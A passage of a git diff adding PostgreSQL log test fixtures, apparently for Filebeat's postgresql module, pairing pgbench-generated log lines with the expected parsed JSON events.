d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:47.439 UTC [149] postgres@postgres LOG: duration: 0.754 ms +2021-03-17 15:10:57.720 UTC [157] postgres@postgres LOG: statement: SELECT d.datname as "Name", + pg_catalog.pg_get_userbyid(d.datdba) as "Owner", + pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding", + d.datcollate as "Collate", + d.datctype as "Ctype", + pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges" + FROM pg_catalog.pg_database d + ORDER BY 1; +2021-03-17 15:10:57.721 UTC [157] postgres@postgres LOG: duration: 1.267 ms +2021-03-17 15:11:05.347 UTC [160] postgres@accounts LOG: statement: select count(*) from pgbench_branches +2021-03-17 15:11:05.350 UTC [160] postgres@accounts LOG: duration: 3.579 ms +2021-03-17 15:11:05.351 UTC [160] postgres@accounts LOG: statement: vacuum pgbench_branches +2021-03-17 15:11:05.364 UTC [160] postgres@accounts LOG: duration: 13.357 ms +2021-03-17 15:11:05.364 UTC [160] postgres@accounts LOG: statement: vacuum pgbench_tellers +2021-03-17 15:11:05.366 UTC [160] postgres@accounts LOG: duration: 1.519 ms +2021-03-17 15:11:05.366 UTC [160] postgres@accounts LOG: statement: truncate pgbench_history +2021-03-17 15:11:05.370 UTC [160] postgres@accounts LOG: duration: 3.909 ms +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: duration: 0.206 ms +2021-03-17 15:11:05.502 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 4666 WHERE aid = 31910; +2021-03-17 15:11:05.504 UTC [161] postgres@accounts LOG: duration: 2.372 ms +2021-03-17 15:11:05.504 UTC [161] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 31910; +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.230 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 4666 WHERE tid = 4; +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.335 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 4666 WHERE bid = 1; +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: duration: 0.266 ms +2021-03-17 15:11:05.505 UTC [161] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 31910, 4666, CURRENT_TIMESTAMP); +2021-03-17 15:11:05.506 UTC [161] postgres@accounts LOG: duration: 0.353 ms +2021-03-17 15:11:05.506 UTC [161] postgres@accounts LOG: statement: END; +2021-03-17 15:11:05.507 UTC [161] postgres@accounts LOG: duration: 1.203 ms +2021-03-17 15:11:06.264 UTC [162] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.265 UTC [162] postgres@accounts LOG: duration: 0.867 ms +2021-03-17 15:11:06.265 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -3403 WHERE aid = 84799; +2021-03-17 15:11:06.268 UTC [162] postgres@accounts LOG: duration: 3.093 ms +2021-03-17 15:11:06.269 UTC [162] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 84799; +2021-03-17 15:11:06.269 UTC [162] postgres@accounts LOG: duration: 0.547 ms +2021-03-17 15:11:06.270 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3403 WHERE tid = 1; +2021-03-17 15:11:06.271 UTC [162] postgres@accounts LOG: duration: 1.155 ms +2021-03-17 15:11:06.271 UTC [162] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3403 WHERE bid = 1; +2021-03-17 15:11:06.272 UTC [162] postgres@accounts LOG: duration: 0.830 ms +2021-03-17 15:11:06.272 UTC [162] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (1, 1, 84799, -3403, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.273 UTC [162] postgres@accounts LOG: duration: 0.967 ms +2021-03-17 15:11:06.274 UTC [162] postgres@accounts LOG: statement: END; +2021-03-17 15:11:06.276 UTC [162] postgres@accounts LOG: duration: 2.296 ms +2021-03-17 15:11:06.322 UTC [163] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.323 UTC [163] postgres@accounts LOG: duration: 0.427 ms +2021-03-17 15:11:06.323 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + -3703 WHERE aid = 87965; +2021-03-17 15:11:06.326 UTC [163] postgres@accounts LOG: duration: 3.367 ms +2021-03-17 15:11:06.327 UTC [163] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 87965; +2021-03-17 15:11:06.327 UTC [163] postgres@accounts LOG: duration: 0.620 ms +2021-03-17 15:11:06.328 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + -3703 WHERE tid = 4; +2021-03-17 15:11:06.330 UTC [163] postgres@accounts LOG: duration: 2.630 ms +2021-03-17 15:11:06.331 UTC [163] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + -3703 WHERE bid = 1; +2021-03-17 15:11:06.332 UTC [163] postgres@accounts LOG: duration: 1.581 ms +2021-03-17 15:11:06.333 UTC [163] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (4, 1, 87965, -3703, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.334 UTC [163] postgres@accounts LOG: duration: 1.282 ms +2021-03-17 15:11:06.334 UTC [163] postgres@accounts LOG: statement: END; +2021-03-17 15:11:06.337 UTC [163] postgres@accounts LOG: duration: 2.580 ms +2021-03-17 15:11:06.586 UTC [164] postgres@accounts LOG: statement: BEGIN; +2021-03-17 15:11:06.587 UTC [164] postgres@accounts LOG: duration: 0.389 ms +2021-03-17 15:11:06.587 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_accounts SET abalance = abalance + 2855 WHERE aid = 24128; +2021-03-17 15:11:06.589 UTC [164] postgres@accounts LOG: duration: 2.526 ms +2021-03-17 15:11:06.590 UTC [164] postgres@accounts LOG: statement: SELECT abalance FROM pgbench_accounts WHERE aid = 24128; +2021-03-17 15:11:06.590 UTC [164] postgres@accounts LOG: duration: 0.468 ms +2021-03-17 15:11:06.591 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_tellers SET tbalance = tbalance + 2855 WHERE tid = 7; +2021-03-17 15:11:06.591 UTC [164] postgres@accounts LOG: duration: 0.940 ms +2021-03-17 15:11:06.592 UTC [164] postgres@accounts LOG: statement: UPDATE pgbench_branches SET bbalance = bbalance + 2855 WHERE bid = 1; +2021-03-17 15:11:06.593 UTC [164] postgres@accounts LOG: duration: 0.862 ms +2021-03-17 15:11:06.593 UTC [164] postgres@accounts LOG: statement: INSERT INTO pgbench_history (tid, bid, aid, delta, mtime) VALUES (7, 1, 24128, 2855, CURRENT_TIMESTAMP); +2021-03-17 15:11:06.594 UTC [164] postgres@accounts LOG: duration: 0.838 ms +2021-03-17 15:11:06.594 UTC [164] postgres@accounts LOG: statement: END; +2021-03-17 15:11:06.596 UTC [164] postgres@accounts LOG: duration: 2.070 ms diff --git a/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json new file mode 100644 index 00000000000..b5254bdf0ca --- /dev/null +++ b/filebeat/module/postgresql/log/test/postgresql-9-log-statement-all.log-expected.json @@ -0,0 +1,2708 @@ +[ + { + "@timestamp": "2021-03-17T15:10:20.767Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 0, + "message": "2021-03-17 15:10:20.767 UTC [118] postgres@postgres LOG: statement: CREATE DATABASE accounts;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "CREATE DATABASE accounts;", + "postgresql.log.timestamp": "2021-03-17 15:10:20.767 UTC", + "process.pid": 118, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:21.486Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 719435968, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 95, + "message": "2021-03-17 15:10:21.486 UTC [118] postgres@postgres LOG: duration: 719.436 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:21.486 UTC", + "process.pid": 118, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:27.112Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.flags": [ + "multiline" + ], + "log.level": "LOG", + "log.offset": 174, + "message": "2021-03-17 15:10:27.112 UTC [126] postgres@postgres LOG: statement: SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.timestamp": "2021-03-17 15:10:27.112 UTC", + "process.pid": 126, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:27.115Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 2710000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 579, + "message": "2021-03-17 15:10:27.115 UTC [126] postgres@postgres LOG: duration: 2.710 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:27.115 UTC", + "process.pid": 126, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:37.302Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.flags": [ + "multiline" + ], + "log.level": "LOG", + "log.offset": 656, + "message": "2021-03-17 15:10:37.302 UTC [135] postgres@postgres LOG: statement: SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.database": "postgres", + "postgresql.log.query": "SELECT d.datname as \"Name\",\n\t pg_catalog.pg_get_userbyid(d.datdba) as \"Owner\",\n\t pg_catalog.pg_encoding_to_char(d.encoding) as \"Encoding\",\n\t d.datcollate as \"Collate\",\n\t d.datctype as \"Ctype\",\n\t pg_catalog.array_to_string(d.datacl, E'\\n') AS \"Access privileges\"\n\tFROM pg_catalog.pg_database d\n\tORDER BY 1;", + "postgresql.log.timestamp": "2021-03-17 15:10:37.302 UTC", + "process.pid": 135, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:37.303Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1111000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1061, + "message": "2021-03-17 15:10:37.303 UTC [135] postgres@postgres LOG: duration: 1.111 ms", + "postgresql.log.database": "postgres", + "postgresql.log.timestamp": "2021-03-17 15:10:37.303 UTC", + "process.pid": 135, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1138, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_history", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_history", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 648000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1244, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: duration: 0.648 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.085Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1321, + "message": "2021-03-17 15:10:42.085 UTC [137] postgres@accounts LOG: statement: create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_history(tid int,bid int,aid int,delta int,mtime timestamp,filler char(22))", + "postgresql.log.timestamp": "2021-03-17 15:10:42.085 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.088Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3140000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1489, + "message": "2021-03-17 15:10:42.088 UTC [137] postgres@accounts LOG: duration: 3.140 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.088 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1566, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_tellers", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_tellers", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 229000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1672, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: duration: 0.229 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.089Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1749, + "message": "2021-03-17 15:10:42.089 UTC [137] postgres@accounts LOG: statement: create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_tellers(tid int not null,bid int,tbalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.089 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.092Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 3339000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 1924, + "message": "2021-03-17 15:10:42.092 UTC [137] postgres@accounts LOG: duration: 3.339 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.092 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2001, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_accounts", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 229000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2108, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: duration: 0.229 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.095Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2185, + "message": "2021-03-17 15:10:42.095 UTC [137] postgres@accounts LOG: statement: create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_accounts(aid int not null,bid int,abalance int,filler char(84)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.095 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.096Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1494000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2364, + "message": "2021-03-17 15:10:42.096 UTC [137] postgres@accounts LOG: duration: 1.494 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.096 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2441, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: drop table if exists pgbench_branches", + "postgresql.log.database": "accounts", + "postgresql.log.query": "drop table if exists pgbench_branches", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 166000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2548, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: duration: 0.166 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.097Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2625, + "message": "2021-03-17 15:10:42.097 UTC [137] postgres@accounts LOG: statement: create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "create table pgbench_branches(bid int not null,bbalance int,filler char(88)) with (fillfactor=100)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.097 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.099Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 1914000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2793, + "message": "2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: duration: 1.914 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.099 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.099Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2870, + "message": "2021-03-17 15:10:42.099 UTC [137] postgres@accounts LOG: statement: begin", + "postgresql.log.database": "accounts", + "postgresql.log.query": "begin", + "postgresql.log.timestamp": "2021-03-17 15:10:42.099 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 559000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 2945, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.559 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3022, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_branches(bid,bbalance) values(1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 399000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3146, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: duration: 0.399 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.100Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3223, + "message": "2021-03-17 15:10:42.100 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (1,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.100 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 281000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3353, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.281 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3430, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into pgbench_tellers(tid,bid,tbalance) values (2,1,0)", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.duration": 90000, + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3560, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: duration: 0.090 ms", + "postgresql.log.database": "accounts", + "postgresql.log.timestamp": "2021-03-17 15:10:42.101 UTC", + "process.pid": 137, + "related.user": [ + "postgres" + ], + "service.type": "postgresql", + "user.name": "postgres" + }, + { + "@timestamp": "2021-03-17T15:10:42.101Z", + "event.category": [ + "database" + ], + "event.dataset": "postgresql.log", + "event.kind": "event", + "event.module": "postgresql", + "event.timezone": "UTC", + "event.type": [ + "info" + ], + "fileset.name": "log", + "input.type": "log", + "log.level": "LOG", + "log.offset": 3637, + "message": "2021-03-17 15:10:42.101 UTC [137] postgres@accounts LOG: statement: insert into pgbench_tellers(tid,bid,tbalance) values (3,1,0)", + "postgresql.log.database": "accounts", + "postgresql.log.query": "insert into 